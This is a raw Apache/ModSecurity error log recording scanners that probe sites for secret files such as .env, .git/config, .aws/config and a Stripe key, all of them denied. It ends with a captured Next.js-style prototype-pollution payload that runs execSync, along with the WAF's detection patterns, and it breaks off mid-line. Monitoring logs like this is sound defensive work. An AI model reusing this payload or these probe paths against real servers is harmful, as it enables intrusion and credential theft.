[Wed Dec 10 07:48:28.030668 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aTkXvLP2BPelBlHY7gEeogAAAAs"]
[Wed Dec 10 07:48:28.030868 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aTkXvLP2BPelBlHY7gEeogAAAAs"]
[Wed Dec 10 07:48:46.140471 2025] [authz_core:error] [pid 636939] [client 45.148.10.247:53196] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Services
[Wed Dec 10 07:48:46.198692 2025] [authz_core:error] [pid 636939] [client 45.148.10.247:53196] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Http
[Wed Dec 10 07:48:46.336952 2025] [:error] [pid 636939] [client 45.148.10.247:53196] [client 45.148.10.247] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "aTkXzrCnovWtbeVvHnHWoQAAAAQ"]
[Wed Dec 10 07:48:46.337307 2025] [:error] [pid 636939] [client 45.148.10.247:53196] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "aTkXzrCnovWtbeVvHnHWoQAAAAQ"]
[Wed Dec 10 07:48:46.337594 2025] [:error] [pid 636939] [client 45.148.10.247:53196] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "aTkXzrCnovWtbeVvHnHWoQAAAAQ"]
[Wed Dec 10 07:48:46.385607 2025] [authz_core:error] [pid 636939] [client 45.148.10.247:53196] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Wed Dec 10 07:48:46.427354 2025] [authz_core:error] [pid 636939] [client 45.148.10.247:53196] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Wed Dec 10 07:48:46.734441 2025] [authz_core:error] [pid 637203] [client 45.148.10.247:53220] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/settings_stripe.py
[Wed Dec 10 07:48:47.961226 2025] [:error] [pid 642265] [client 45.148.10.247:41794] [client 45.148.10.247] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aTkXz7P2BPelBlHY7gEerQAAAAs"]
[Wed Dec 10 07:48:47.961461 2025] [:error] [pid 642265] [client 45.148.10.247:41794] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aTkXz7P2BPelBlHY7gEerQAAAAs"]
[Wed Dec 10 07:48:47.961843 2025] [:error] [pid 642265] [client 45.148.10.247:41794] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aTkXz7P2BPelBlHY7gEerQAAAAs"]
[Wed Dec 10 08:53:34.726440 2025] [authz_core:error] [pid 642265] [client 68.183.9.16:44874] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 10 08:53:37.744951 2025] [:error] [pid 642267] [client 68.183.9.16:49914] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTknAeZ0wa7AiKX8edeoLwAAAAI"]
[Wed Dec 10 08:53:37.745235 2025] [:error] [pid 642267] [client 68.183.9.16:49914] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTknAeZ0wa7AiKX8edeoLwAAAAI"]
[Wed Dec 10 08:53:37.745456 2025] [:error] [pid 642267] [client 68.183.9.16:49914] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTknAeZ0wa7AiKX8edeoLwAAAAI"]
[Wed Dec 10 08:53:38.753824 2025] [:error] [pid 642268] [client 68.183.9.16:49918] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTknAijDeI-4sHVdKxOQHgAAAAw"]
[Wed Dec 10 08:53:38.754960 2025] [:error] [pid 642268] [client 68.183.9.16:49918] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTknAijDeI-4sHVdKxOQHgAAAAw"]
[Wed Dec 10 08:53:38.755185 2025] [:error] [pid 642268] [client 68.183.9.16:49918] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTknAijDeI-4sHVdKxOQHgAAAAw"]
[Wed Dec 10 08:53:40.748495 2025] [:error] [pid 642280] [client 68.183.9.16:49924] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTknBBSjobP9P3N0Egkb1AAAAAk"]
[Wed Dec 10 08:53:40.748744 2025] [:error] [pid 642280] [client 68.183.9.16:49924] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTknBBSjobP9P3N0Egkb1AAAAAk"]
[Wed Dec 10 08:53:40.748932 2025] [:error] [pid 642280] [client 68.183.9.16:49924] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTknBBSjobP9P3N0Egkb1AAAAAk"]
[Wed Dec 10 15:41:49.329817 2025] [authz_core:error] [pid 637203] [client 139.59.132.8:41270] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 10 15:41:52.400797 2025] [:error] [pid 636939] [client 139.59.132.8:41292] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTmGsLCnovWtbeVvHnHXQQAAAAQ"]
[Wed Dec 10 15:41:52.401055 2025] [:error] [pid 636939] [client 139.59.132.8:41292] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTmGsLCnovWtbeVvHnHXQQAAAAQ"]
[Wed Dec 10 15:41:52.401247 2025] [:error] [pid 636939] [client 139.59.132.8:41292] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTmGsLCnovWtbeVvHnHXQQAAAAQ"]
[Wed Dec 10 15:41:53.404632 2025] [:error] [pid 642268] [client 139.59.132.8:41300] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTmGsSjDeI-4sHVdKxOQTgAAAAw"]
[Wed Dec 10 15:41:53.404872 2025] [:error] [pid 642268] [client 139.59.132.8:41300] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTmGsSjDeI-4sHVdKxOQTgAAAAw"]
[Wed Dec 10 15:41:53.405066 2025] [:error] [pid 642268] [client 139.59.132.8:41300] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTmGsSjDeI-4sHVdKxOQTgAAAAw"]
[Wed Dec 10 15:41:55.403793 2025] [:error] [pid 642265] [client 139.59.132.8:41312] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTmGs7P2BPelBlHY7gEe6AAAAAs"]
[Wed Dec 10 15:41:55.404134 2025] [:error] [pid 642265] [client 139.59.132.8:41312] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTmGs7P2BPelBlHY7gEe6AAAAAs"]
[Wed Dec 10 15:41:55.404343 2025] [:error] [pid 642265] [client 139.59.132.8:41312] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTmGs7P2BPelBlHY7gEe6AAAAAs"]
[Wed Dec 10 20:11:55.654969 2025] [authz_core:error] [pid 642267] [client 159.89.127.165:34902] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 10 20:11:58.697191 2025] [:error] [pid 642268] [client 159.89.127.165:34922] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTnF_ijDeI-4sHVdKxOQ4QAAAAw"]
[Wed Dec 10 20:11:58.697424 2025] [:error] [pid 642268] [client 159.89.127.165:34922] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTnF_ijDeI-4sHVdKxOQ4QAAAAw"]
[Wed Dec 10 20:11:58.697603 2025] [:error] [pid 642268] [client 159.89.127.165:34922] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTnF_ijDeI-4sHVdKxOQ4QAAAAw"]
[Wed Dec 10 20:11:59.652969 2025] [:error] [pid 642280] [client 159.89.127.165:34938] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTnF_xSjobP9P3N0EgkcpAAAAAk"]
[Wed Dec 10 20:11:59.653241 2025] [:error] [pid 642280] [client 159.89.127.165:34938] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTnF_xSjobP9P3N0EgkcpAAAAAk"]
[Wed Dec 10 20:11:59.653417 2025] [:error] [pid 642280] [client 159.89.127.165:34938] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTnF_xSjobP9P3N0EgkcpAAAAAk"]
[Wed Dec 10 20:12:01.654309 2025] [:error] [pid 636936] [client 159.89.127.165:34952] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTnGASj7S3f8o0DuYfxzxAAAAAE"]
[Wed Dec 10 20:12:01.654616 2025] [:error] [pid 636936] [client 159.89.127.165:34952] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTnGASj7S3f8o0DuYfxzxAAAAAE"]
[Wed Dec 10 20:12:01.654807 2025] [:error] [pid 636936] [client 159.89.127.165:34952] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTnGASj7S3f8o0DuYfxzxAAAAAE"]
[Wed Dec 10 23:34:19.381928 2025] [:error] [pid 657889] [client 3.75.170.6:46514] [client 3.75.170.6] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTn1a-Zts9-519mDKTwjVgAAAAM"]
[Wed Dec 10 23:34:19.382528 2025] [:error] [pid 657889] [client 3.75.170.6:46514] [client 3.75.170.6] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: 